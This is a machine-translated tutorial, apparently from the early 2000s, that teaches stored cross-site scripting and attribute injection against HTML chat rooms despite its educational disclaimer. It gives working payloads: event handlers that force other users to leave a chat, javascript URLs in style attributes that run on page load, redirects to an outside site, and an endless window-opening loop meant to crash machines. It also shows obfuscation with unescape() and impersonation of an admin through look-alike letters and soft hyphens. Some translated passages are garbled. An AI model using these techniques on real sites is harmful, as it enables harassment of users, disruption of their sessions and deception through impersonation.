This page has been robot translated, sorry for typos if any. Original content here.

Hacking Chat Part 1 (Theory and Practice)



  • Part 1
  • Part 2


  • This page does not in any way call for illegal activities, "cracking", etc. The main goal is to study the features of HTML and prevent errors associated with its use. The author is not responsible for any illegal use of the information provided. About all detected errors in chats, the administration of chats was informed by the author.
    All examples provided in the article are tested and work in MSIE 5.50.4134.0600. I can’t guarantee performance in other versions, but I’m sure that almost all examples will work there.

    Glossary

    Hacking through a nickname (handler without quotes)
    Hacking through a nickname (the processor is enclosed in quotation marks)
    Hacking through a nickname (the filter does not pass quotes / desired characters)
    Hacking through color (attribute without quotes)
    Hacking through color (attribute with quotes)
    What characters should be checked for filters
    Handler Constraints
    Nick fake, empty nicknames

    General theory

    Here I want to dwell on the basics of hacking chats. I apologize in advance to advanced readers - these methods have long been known and are as old as the world. If you are advanced enough, you can focus on subsequent chapters.

    First of all, I want to note that each chat is original and unique in its own way (with the exception of replicated copies of one CSG, of course). Therefore, there are no absolutely universal hacking methods. Almost every chat has features that you need to consider, and without which, stupid templates will not work.

    First of all, what do I actually mean by hacking HTML chat? This is not a banal flood, and not an attack on IP chat. By hacking we mean unauthorized modification of the HTML chat document, or access to its hidden parts (for example, privates), i.e. such an effect on the chat, which was not provided and allowed for users. This applies equally not only to chat rooms, but also to forums, guest books, etc. (where all the methods described above also work, and even better, since these forms are protected, as a rule, worse than chats).

    Everything described applies only to HTML chat. Hacking Java chats is a separate and completely different song. I hope you can distinguish one type of chat from another :) )

    So, we are on the verge of HTML chat. Suppose we want to test it for "strength." What to do first? First of all, we connect through an anonymous proxy (I hope you know what it is). This is necessary for two reasons: firstly, we ensure our anonymity (so that the uncle admin doesn’t push on the ass), and secondly, if the admin still doesn’t like our experiments and he closes the window to us in the chat, then we could switch your proxies to other IP addresses and enter the chat again. The truth here is one thing: entrance to some chats is not allowed through public proxies.

    Next, we must find out what kind of weapon we actually have, that is, what attributes the user can set. As a rule, in all chats you can enter the nickname of the user, as well as the color of the user. In addition, sometimes it is possible to set the SOAP of the user, his home page, gender, chat refresh rate, etc. In practice, such fields as color, nickname, soap, and the user's home page are of interest. They are inserted directly into the body of the document, and therefore it is through them that you can attack chat. It should be noted that some chats require registration, and some of the attributes are set during registration, and some immediately before entering the chat (or already inside the chat). Registration chats are usually more cool and better protected.

    > Let us identify the possible hacking paths. First of all, let us sharpen the fragment of the form code in which the color of our messages is set (by the way, the color can be set separately for the nickname and for the text of the messages - you need to check both of them, since they can be analyzed differently by chat). Why is color the first thing that interests us? Because the color is indicated inside the tags, in their parameters, in contrast to, for example, the nickname, which most often appears in the body of tags. And for hacking the chat, we need to get inside the tag’s parameters so that we can change its attributes or insert our own script (sometimes, of course, any tags can be written simply in the message body, until recently, for example, chat.rambler chat . ru , but this option is so dumb that such chats probably no longer exist, and I do not consider it).

    We are interested in the form in which color information is sent to the server. The least protected is the string type, when the color is transmitted in the form of its own name. For example:

    <select name=youcolor style="width: 70px">
    <option value=blue>синий value=blue
    <option value=red>красный
    <option value=darkred>т-красный
    <option value=green>зеленый
    <option value=black>черный value=black
    <option value=lightblue>голубой value=lightblue
    </select>

    Such a chat, as a rule, breaks to one degree or another. :) . A worse option is if the color is returned as a numerical code:

    <select name=youcolor style="width: 70px">
    <option value=#0000FF>синий value=#0000FF
    <option value=#AF0000>красный
    <option value=#FF0000>т-красный
    <option value=green>зеленый
    <option value=#000000>черный value=#000000
    <option value=#0000AF>голубой value=#0000AF
    </select>

    In this chat, there may be filters for all characters except numbers, the # sign and the letters A, B, C, D, E and F. Then you will have to forget about hacking through color.

    And finally, the worst case scenario is when a color is simply transmitted as a number from a list of valid colors:

    <select name=youcolor style="width:70px">
    <option value=1>синий <
    <option value=2>красный <
    <option value=3>т-красный <
    <option value=4>зеленый <
    <option value=5>черный <
    <option value=6>голубой <
    </select>

    As a rule, it is impossible to crack such a chat through color (and often impossible at all). This is the most secure option (by the way, I recommend chat developers).

    Next, we need to change the HTML code so that we can freely send arbitrary attribute values ​​to the server. To do this, save the site on your disk and change the chat login (or registration) form as follows: change the relative address of the action parameter of the form to the full address. We replace all hidden tags with text , and select tags with input . In addition, you need to remove restrictions on the length of the input value (if any). For example, if the original form was:



    <form name="logon" method="POST" action="/cgi-bin/chat/chat.cgi">
    <table cellspacing="0" cellpadding="0">
    <tr>

    <td valign="middle">
    <small>Nickname:</small>
    <input type="text" name="username" size="12" maxlength="12" >
    </td>

    <td valign="middle"><small> TextColor:</small>
    <select name="color">

    <option selected value="black">black
    <option selected value="red">red
    <option selected value="blue">blue
    </select>

    </td>
    <td valign="middle">

    <small>
    <input type=submit value="Join Chat">
    </small>
    </td>

    <input type=hidden name=message value="logged on.">

    <input type=hidden name="logon" value="">
    <input type=hidden name=to value="Room">
    <input type=hidden name=frames value="yes">

    </td>
    </tr>
    </table>

    </form>


    Then after appropriate replacements we get:



    <form name="logon" method="POST" action="http://typachat.ru/cgi-bin/chat/chat.cgi">

    <table cellspacing="0" cellpadding="0">
    <tr>

    <td valign="middle"><small>Nickname:</small>

    <input type="text" name="username" >

    </td>

    <td valign="middle"><small> Text Color:</small>

    <input name="color">

    <option selected value="black">black
    <option selected value="red">red
    <option selected value="blue">blue

    </select>

    </td>
    <td valign="middle">

    <small>
    <input type=submit value="Join Chat">
    </small>
    </td>

    <input type=text name=message value="logged on.">

    <input type=text name="logon" value="">

    <input type=text name=to value="Room">
    <input type=text name=frames value="yes">

    </td>
    </tr>
    </table>

    </form>


    Note that a document can be created dynamically through functions such as document.write () , then, most likely, you will have to convert it to a static view. In addition, it often happens that after saving HTML to disk, the chat does not want to open. This may be due to the fact that the site was not completely saved if it consisted of frames. In this case, you need to more carefully understand the structure of the page and save everything correctly. Another reason may be that the server monitors the referer field of the http request header, and notices that we are not visiting from its page. In this case, you need to use other methods, which we will stop in the chapter "Hacking at the http level".

    Now we can experiment with chat. First of all, you need to find out what filters are on the entered values ​​(first for color and nickname). We are primarily interested in the following characters:

    " ' ` = < > ; \ & % пробел " ' ` = < > ; \ & % пробел " ' ` = < > ; \ & % пробел " ' ` = < > ; \ & % пробел " ' ` = < > ; \ & % пробел " ' ` = < > ; \ & % пробел " ' ` = < > ; \ & % пробел " ' ` = < > ; \ & % пробел " ' ` = < > ; \ & % пробел " ' ` = < > ; \ & % пробел " ' ` = < > ; \ & % пробел

    We enter them into the color and nickname fields, go into the chat (if we are allowed to go there with such attributes; if they are not allowed to go, we will have to sort the characters one by one), and see what characters were skipped by the filter (by writing something like “hello” to the chat, and having seen in the HTML text which color and nickname characters are present). Some chats simply remove the filtered characters, some replace them with other characters, and some convert to an encoded form like < or . Such converted characters do not suit us, because HTML does not perceive them (however, for more details, see the chapter "A few more hacks of the long-suffering chat T").

    As a result, we should have a list of skipped characters for each attribute of the registration form.

    Next, we are faced with the task of penetrating inside any tag in order to change its parameters or insert our own script there. There are two fundamentally different ways to do this: the first is that the code we need is transmitted through the attributes that are already inside the tag (i.e. between the angle brackets) - for example, through the color or address of the soap. The second is to break the structure of the HTML code in such a way that the code we need is inside the tag. How to do this is determined by analyzing the specific structure of the chat code and a set of unfiltered characters for our attributes. We will consider various hacking options in the following examples. In the meantime, I would like to dwell on some features of HTML, which actually allow us to produce interesting "effects".

    HTML features

    P> Here I am not going to give a lecture on HTML for dummies. I hope that you know what a tag is and its parameters, are familiar with JavaScript and have written at least one web page in your life in HTML (and not in FrontPage).

    The biggest trouble (and at the same time the strength) of HTML is that it does not have a single standard. That is, it seems to be there, but the standards are so diverse, and there are so many of them intertwined in HTML that no one knows it thoroughly (and often does not know what it is). In addition, competition among browsers and the diversity of sites leads to the fact that browsers try to support as many standards and technologies as possible. Moreover, the lack of common standards led to the fact that webmasters even on one page manage to mix in different styles: o (. However, this is what allows hackers to crack HTML, and causes a lot of headache for developers.

    A simple question: what are the separators in HTML and JavaScript? Even I can not immediately and unequivocally answer this question. Consider an example:

    <font onclick= "alert()">Text</font>

    Everything is clear and obvious here. There is a tag that has a click event handler written in JavaScript, the text of which is enclosed in double quotes. That JavaScript is used can be specified explicitly:

    <font onclick="javascript:alert()">Text</font>

    The string delimiters in these examples are double quotation marks. However, you can do without them. Since only a static handler string can follow after onclick = , HTML allows quotation marks to be omitted (this applies to many cases where the argument can only be a constant string). Thus, this design also works:

    <font onclick=alert()>Text</font>

    and now instead of an empty message we’ll insert something meaningful:

    <font onclick=alert('Привет друзья!')>Text</font>

    Opening the demo link shows that this example does not work. The reason is this: the body of the handler can not be enclosed in quotation marks, but in this case the first space is considered the end of the line-handler (even if the space itself is inside the quotation marks). Therefore, the browser only considers the alert fragment as the handler ('Hello , and finding an unquoted quote displays an error message. Why does the browser not respond to the space inside the quotation marks? I think the reason is that two languages ​​are mixed here: HTML and JavaScript. The browser "saw" that after the = sign there is no quotation mark and therefore began to look for a space - like the end of a handler. At the moment, the handler was not interested in the interior of the handler, since it was not in HTML but in JavaScript. Thus, he simply did not notice the opening quotation mark and took a gap for the horse q parameter values ​​The following constructions work without errors:

    <font onclick="alert('Привет друзья!')">Text</font>
    <font onclick=alert('Привет_друзья!')>Text</font>
    <font onclick="alert('Привет друзья!')"onmouseover='alert()'>Text</font>
    <font color=alert('Привет друзья!')>Text</font>

    We note an important feature: if the tag parameter value is in quotation marks, then the space before the next parameter can be omitted (third line of the example). The fourth line of the example also works (in the sense that the browser does not swear, but the script certainly does not work), since the browser does not consider the contents of the color attribute as JavaScript, and therefore does not swear at the unquoted quote, although only the alert (' Hi (an arbitrary string can act as a color in HTML, in this case the browser converts the string to a certain numerical value which it considers to be a color).

    Are there any other characters - delimiters of the handler without quotes (except for the space and the > character) - the question is open. I don’t know such people, but I admit that they can be.

    As can be seen from the above examples, double and single quotes can be line delimiters. This applies equally to both HTML and JavaScript, however, it turns out there is at least one more character that is a line terminator in HTML (but not in JavaScript!). This is the symbol of the backward apostrophe ` (usually located on the same key with the letter ё ). You can verify the following example:

    <font onclick=`alert('Привет друзья!')`>Text</font>

    I swear that at least 90% of webmasters do not know about this! In any case, I have not yet seen anyone using the reverse apostrophe. This symbol is a find for a hacker. :) )

    It often happens that it is necessary to use inside some quotation marks - others. And this is difficult, especially if the chat misses only one kind of quotation mark. But it turns out JavaScript allows you to insert string constants inside other string constants, and at the same time using the same quotation marks! For example:

    'javascript:st='Фиг вам';document.oncontextmenu=new Function('event.returnValue=alert(st)*0')'

    The example uses nested single quotes, but the interpreter does not throw an error. I note that the contents of the inner quotation marks are not arbitrary: there should not be spaces, and at the end some characters are invalid, for example ; or ) .

    Now let's talk about links. First of all, it is necessary to note such a detail: the Internet developed in such a way that completely different technologies were mixed in it. Access to information can occur through a large number of different protocols. Therefore, when specifying the full path of the document (URL), it is allowed to indicate any of the protocols familiar to the browser. It is noteworthy that javascript is also classified as a protocol (although it is not, but apparently the developers decided that it would be too bold to highlight a separate concept for scripts, and ranked them as protocols). Therefore, wherever a URL can be specified in an HTML document, a script can be inserted. And this script will be executed as soon as the user (or the browser itself) requests this link. For example:

    <a href=javascript:alert()>Text</a>

    Interestingly, in addition to operators, you can simply specify a string (or numeric) value in a JavaScript link (however, it is mandatory after operators, if any). When you click on such a link, the browser will first execute the operators ahead, and then open a new document and put the value of the last line specified in the link there:

    <a href=javascript:alert();'Hello!!'>Text</a> I note that tags cannot be inserted into a new page in this way.

    Hacking chat R

    I will give an example of one of the first chats I hacked. This chat was very simple, and hacked what is called from the first call :) )

    And there are few chats left in which this takes place. Although I thought of these methods myself, but then I found them in hacker magazines.

    The input form of this chat corresponded exactly to the form given in the chapter "General Theory". After converting and saving the form to disk, I checked which characters in the color attribute pass. It turned out that the following characters pass (of those that interest us, see the chapter "General Theory"):

    ' ` = ; % пробел ' ` = ; % пробел ' ` = ; % пробел ' ` = ; % пробел ' ` = ; % пробел ' ` = ; % пробел ' ` = ; % пробел ' ` = ; % пробел ' ` = ; % пробел

    And of course, all the numbers and letters went through. The length of the string is the color value is not limited. Next, I looked exactly where the color is inserted in the message frame. Here is a snippet of this frame:

    <font color=Black><b>Путник</b>- Alpha, привет ))</font>
    <font color=Red><b>Alpha</b>- Всемприветик !!</font>

    As you can see, the color is inserted without the surrounding quotation marks. It suited me. I logged in under the name Shram (well, or almost under that nickname;)) and the color red size = 20 . My post looked like this:

    <font color=red size=20><b>Algol</b>- Hi</font>

    It was displayed in very large print, which slightly surprised the chat population :) )

    Thus, despite the fact that we cannot directly insert tags, but the permission to enter a space in the color attribute allowed us to set unauthorized tag parameters. However, this was certainly not enough for me. Changing the font size is certainly cool, but really something useful can only be done using scripts. I could not insert the script tag directly (or rather, at that time I did not yet know how to do this). But I could set a handler for some tag event. Here is what color I asked in order to remove some moron from the chat:
    #A0A000 onmouseover=parent.frames[2].forms[0].ExitChat.click() size=30. And then sent him a long, long message in private. I selected the message color in such a way that it would not differ from the background color. And the font size and length of the message were so huge that the victim probably at least once clicked on the message, as a result of which my onmouseover handler clicked the "leave chat" button instead of the user :) )

    However, gradually there were clever people who figured out a joke, and intentionally did not carry the cursor on the chat window. My script did not always work :( (. At first I thought there was no way out. Since I can only insert the script as an event handler, then if this event does not occur, then the script does not work. But, digging through the "annals", I found a solution (now it has become trivial and it’s widely known.) It turned out that you can specify the URL of the background image for the tag in the style attribute. And where you can specify the URL, you can also write the script. The main thing is that the background image was loaded by itself when the HTML document was loaded! If I wanted to show alert to chat participants, I logged in with the following color in the summer:

    style=background-image:url(javascript:alert('приветик_всем_!!'));

    An important detail should be noted: since the structure of most HTML chats is such that the page is regularly updated, the script sent this way is executed not once, but a lot, until our message disappears from the screen.

    And here is what the color attribute values ​​looked like for ejecting from the chat:

    style=background-image:url(javascript:parent.frames[2].forms[0].ExitChat.click());

    You need to remember: the script sent in private will be seen not only by your "interlocutor", but also by yourself, so you need to know how to protect yourself from the influence of the script yourself. This can be done in two ways: either put ourselves in ignore (and then we won’t see our own messages), or in the browser settings, disable the display of images. Then the script that works through the background image will not work.

    Now I want to show some useful scripts that can be used in hacked chats:

    javascript: navigate ('http://myserver.ru'); - loads myserver.ru website into the current frame (or page).
    Some chats, at the sight of the http: // snippet, consider this a link, and automatically insert the <a> tag. Since this will destroy our script, this cannot be allowed. To do this, simply omit the http: prefix (which is already accepted by default). Then the script will look: javascript: navigate ('// myserver.ru'); .Two forward slashes ahead - mandatory.

    javascript: parent.frames [2] .document.location = 'http: //myserver.ru' - loads myserver.ru into one of the frames.

    javascript: for (;;) open () - opens an infinite number of windows (if you do not navigate in time, it will cause the machine to crash and reboot later).

    javascript: document.write ('<script> alert () </script>') - replaces the current frame with a script, which is then executed. Note: if a chat doesn’t miss the <and> characters (and this is an overwhelming number of chats), we won’t be able to insert such a script. But there is a way out. This is an application of the unescape () function, which converts the ASCII code of a character to a character. Replace the angle brackets with the unescape () function with the corresponding codes, then our script will take the form:

    javascript:document.write(unescape('%3C')+'script'+unescape('%3E')+'alert()'+unescape('%3C')+'/script'+unescape('%3E')) javascript:this.insertBefore(e=document.createElement('IMG'));e.src='demo.jpg' - inserts a picture after the text. I note that in IE 5.x you can insert any tag except FRAME, IFRAME and SELECT.

    But in IE 4.x, the createElement () function only allows the insertion of IMG , AREA, and OPTION tags. I have no information about Netscape, you can experiment yourself. 'javascript:st='Фиг вам';document.oncontextmenu=new Function('event.returnValue=alert(st)*0')' / * blocks the page drop-down menu, and therefore makes it impossible to view the HTML content of the frame. Thanks to this, you can hide your fraud with the body of the chat :) ). * / Sometimes it is useful to log in under someone else's nickname. Chats with a user registration system will not allow you to do this if you do not know the password (and you most likely do not know it). Banal exit: registration with a nickname in which the letter of the Latin alphabet is replaced by a very similar letter of the Russian layout. For example, log in under the nickname admin where the Latin letter a is replaced by the Russian a . The method is primitive, but it works)). There are more severe cases. For example, in some chats, the use of characters from different layouts in one nickname is prohibited. Then the inquiring mind has no choice but to turn to Uncle Gates for help. And here it is human kindness, Microsoft did not forget about sinful users and gave us a symbol ­ (he ­ aka % AD ), which Microsoft itself called "Soft hyphen" ("Short hyphen"). It really looks like a hyphen in Word, and in Excel too, and even in notepad, but not in IE! For Microsoft character explorer ­ it simply does not exist, that is, it seems to be there, but they forgot to make a graphical representation for it. It simply does not appear in the HTML page! Thus, adding a short hyphen to any nickname and registering under it, we enter a chat with a nickname that will look on the HTML page just like a nickname without a hyphen. And you can make it even cooler - log in with a nickname that only consists of short hyphen characters. Then your nickname will not be displayed in the chat at all, absolutely empty place)).

    (Note: Having tinkered a bit more with the symbol of a short hyphen, I still found cases when it appears: It appears only as a hyphen. That is, if the word has a short hyphen and if this word is at the end of the line, then the part of the word after the hyphen be transferred to the next line, and the hyphen itself becomes visible! Thus, the hyphen may be invisible - a deliberate feature of Microsoft (which, however, does not reduce its usefulness in hacks :) ) The truth is incomprehensible why does it still remain always visible in other applications?)



    Next 2 hours. >>